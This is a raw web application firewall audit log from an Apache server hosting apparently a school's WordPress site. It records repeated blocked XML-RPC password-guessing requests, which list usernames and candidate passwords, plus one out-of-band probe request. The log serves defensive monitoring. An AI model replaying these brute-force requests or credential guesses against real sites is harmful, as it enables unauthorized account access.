X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --430be549-C-- wp.getUsersBlogs administrator michael --430be549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430be549-E-- --430be549-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287270022900 5319 (- - -) Stopwatch2: 1749287270022900 5319; combined=4065, p1=504, p2=3363, p3=0, p4=0, p5=119, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430be549-Z-- --a8175c68-A-- [07/Jun/2025:16:08:50 +0700] aEQBomCOO9DrcKL2J_4MdAAAANI 103.236.140.4 47802 103.236.140.4 8181 --a8175c68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8175c68-C-- wp.getUsersBlogs administrator olivia --a8175c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8175c68-E-- --a8175c68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287330313395 6212 (- - -) Stopwatch2: 1749287330313395 6212; combined=4382, p1=548, p2=3564, p3=0, p4=0, p5=150, sr=146, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8175c68-Z-- --3e3eeb09-A-- [07/Jun/2025:16:09:50 +0700] aEQB3hK9gc79coX6mHScYwAAAFY 103.236.140.4 49644 103.236.140.4 8181 --3e3eeb09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e3eeb09-C-- wp.getUsersBlogs kajur kajur12345 --3e3eeb09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e3eeb09-E-- --3e3eeb09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287390206842 4731 (- - -) Stopwatch2: 1749287390206842 4731; combined=3543, p1=451, p2=2840, p3=0, p4=0, p5=141, sr=78, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e3eeb09-Z-- --f0917a10-A-- [07/Jun/2025:16:10:28 +0700] aEQCBBK9gc79coX6mHScsgAAAEc 103.236.140.4 50862 103.236.140.4 8181 --f0917a10-B-- POST /-/jira/login/oauth/access_token HTTP/1.0 Host: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Real-IP: 114.10.45.127 X-Forwarded-Host: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Forwarded-Server: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Forwarded-For: 114.10.45.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/122.0.0.0 Safari/537.36 Accept: text/html Accept-Language: en-US --f0917a10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0917a10-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749287428852695 968 (- - -) Stopwatch2: 1749287428852695 968; combined=347, p1=314, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0917a10-Z-- --3d541838-A-- [07/Jun/2025:16:10:50 +0700] aEQCGpANhDjQAvBdMyHtTwAAAJg 103.236.140.4 51710 103.236.140.4 8181 --3d541838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3d541838-C-- wp.getUsersBlogs kajur kajurpwd --3d541838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d541838-E-- --3d541838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287450744726 5554 (- - -) Stopwatch2: 1749287450744726 5554; combined=3916, p1=501, p2=3226, p3=0, p4=0, p5=109, sr=90, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d541838-Z-- --c3bd6e4d-A-- [07/Jun/2025:16:11:50 +0700] aEQCVvClubEPOra_8UkeFwAAABM 103.236.140.4 53604 103.236.140.4 8181 --c3bd6e4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3bd6e4d-C-- wp.getUsersBlogs kajur nicholas --c3bd6e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3bd6e4d-E-- --c3bd6e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287510570026 4196 (- - -) Stopwatch2: 1749287510570026 4196; combined=3242, p1=390, p2=2702, p3=0, p4=0, p5=88, sr=80, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3bd6e4d-Z-- --bcf56b69-A-- [07/Jun/2025:16:12:50 +0700] aEQCkmCOO9DrcKL2J_4OcAAAANM 103.236.140.4 55364 103.236.140.4 8181 --bcf56b69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bcf56b69-C-- wp.getUsersBlogs kajur asdf3423 --bcf56b69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf56b69-E-- --bcf56b69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287570670169 5391 (- - -) Stopwatch2: 1749287570670169 5391; combined=3828, p1=449, p2=3175, p3=0, p4=0, p5=117, sr=87, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf56b69-Z-- --a2e1c317-A-- [07/Jun/2025:16:13:51 +0700] aEQCzxK9gc79coX6mHSeaQAAAFE 103.236.140.4 56870 103.236.140.4 8181 --a2e1c317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2e1c317-C-- wp.getUsersBlogs kajur Parola12 --a2e1c317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2e1c317-E-- --a2e1c317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287631015152 5316 (- - -) Stopwatch2: 1749287631015152 5316; combined=3697, p1=467, p2=3053, p3=0, p4=0, p5=104, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2e1c317-Z-- --521c007b-A-- [07/Jun/2025:16:14:51 +0700] aEQDC_ClubEPOra_8UkfmwAAAAM 103.236.140.4 58476 103.236.140.4 8181 --521c007b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --521c007b-C-- wp.getUsersBlogs kajur 7654321 --521c007b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521c007b-E-- --521c007b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287691268751 4198 (- - -) Stopwatch2: 1749287691268751 4198; combined=3089, p1=375, p2=2572, p3=0, p4=0, p5=83, sr=74, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521c007b-Z-- --5266c902-A-- [07/Jun/2025:16:15:51 +0700] aEQDR_ClubEPOra_8UkgYgAAAAo 103.236.140.4 60052 103.236.140.4 8181 --5266c902-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5266c902-C-- wp.getUsersBlogs kajur supervisor --5266c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5266c902-E-- --5266c902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287751053071 5987 (- - -) Stopwatch2: 1749287751053071 5987; combined=4200, p1=520, p2=3481, p3=0, p4=0, p5=114, sr=133, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5266c902-Z-- --d468d41a-A-- [07/Jun/2025:16:16:50 +0700] aEQDgvClubEPOra_8UkhTQAAAAo 103.236.140.4 33252 103.236.140.4 8181 --d468d41a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d468d41a-C-- wp.getUsersBlogs kajur 1234%^&* --d468d41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d468d41a-E-- --d468d41a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287810674336 5696 (- - -) Stopwatch2: 1749287810674336 5696; combined=4129, p1=440, p2=3497, p3=0, p4=0, p5=115, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d468d41a-Z-- --a9d3103d-A-- [07/Jun/2025:16:16:51 +0700] aEQDg2COO9DrcKL2J_4QQwAAAMg 103.236.140.4 33262 103.236.140.4 8181 --a9d3103d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a9d3103d-C-- wp.getUsersBlogs kajur pakistan --a9d3103d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d3103d-E-- --a9d3103d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (115+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287811058008 5526 (- - -) Stopwatch2: 1749287811058008 5526; combined=3915, p1=476, p2=3229, p3=0, p4=0, p5=120, sr=108, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d3103d-Z-- --78491f7c-A-- [07/Jun/2025:16:17:51 +0700] aEQDv5ANhDjQAvBdMyHvfwAAAIo 103.236.140.4 35142 103.236.140.4 8181 --78491f7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --78491f7c-C-- wp.getUsersBlogs kajur 159753 --78491f7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78491f7c-E-- --78491f7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287871256193 4371 (- - -) Stopwatch2: 1749287871256193 4371; combined=3402, p1=379, p2=2824, p3=0, p4=0, p5=115, sr=80, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78491f7c-Z-- --dcc16227-A-- [07/Jun/2025:16:18:51 +0700] aEQD-5ANhDjQAvBdMyHwBgAAAJE 103.236.140.4 37044 103.236.140.4 8181 --dcc16227-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dcc16227-C-- wp.getUsersBlogs kesiswaan kesiswaan@ --dcc16227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc16227-E-- --dcc16227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287931088482 5249 (- - -) Stopwatch2: 1749287931088482 5249; combined=3664, p1=426, p2=3052, p3=0, p4=0, p5=107, sr=84, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc16227-Z-- --34aea609-A-- [07/Jun/2025:16:19:51 +0700] aEQEN2COO9DrcKL2J_4SRAAAAM8 103.236.140.4 38926 103.236.140.4 8181 --34aea609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34aea609-C-- wp.getUsersBlogs kesiswaan kesiswaan@1997 --34aea609-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34aea609-E-- --34aea609-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287991222876 5324 (- - -) Stopwatch2: 1749287991222876 5324; combined=3564, p1=501, p2=2898, p3=0, p4=0, p5=97, sr=87, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34aea609-Z-- --80dde223-A-- [07/Jun/2025:16:20:51 +0700] aEQEc5ANhDjQAvBdMyHxGgAAAJU 103.236.140.4 40872 103.236.140.4 8181 --80dde223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --80dde223-C-- wp.getUsersBlogs kesiswaan Marketing2018 --80dde223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80dde223-E-- --80dde223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288051694930 5843 (- - -) Stopwatch2: 1749288051694930 5843; combined=4186, p1=585, p2=3381, p3=0, p4=0, p5=125, sr=166, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 